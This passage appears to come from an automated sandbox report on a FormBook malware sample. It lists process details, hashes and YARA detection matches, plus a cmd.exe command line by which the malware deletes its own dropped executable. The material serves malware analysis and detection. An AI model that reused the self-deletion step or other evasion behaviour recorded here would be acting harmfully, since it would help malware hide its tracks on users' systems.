                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.352889129.0000000007949000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.335987438.0000000007949000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.335987438.0000000007949000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.335987438.0000000007949000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:high

                                      General

                                      Start time:00:36:42
                                      Start date:28/10/2021
                                      Path:C:\Windows\SysWOW64\svchost.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\svchost.exe
                                      Imagebase:0x100000
                                      File size:44520 bytes
                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.558614233.0000000002E40000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.558614233.0000000002E40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.558614233.0000000002E40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.555083742.00000000001A0000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.555083742.00000000001A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.555083742.00000000001A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.559409706.0000000002F40000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.559409706.0000000002F40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.559409706.0000000002F40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:high

                                      General

                                      Start time:00:36:47
                                      Start date:28/10/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del 'C:\Users\user\Desktop\PO_101&102.exe'
                                      Imagebase:0xd80000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:00:36:48
                                      Start date:28/10/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7f20f0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Disassembly

                                      Code Analysis

                                      Reset < >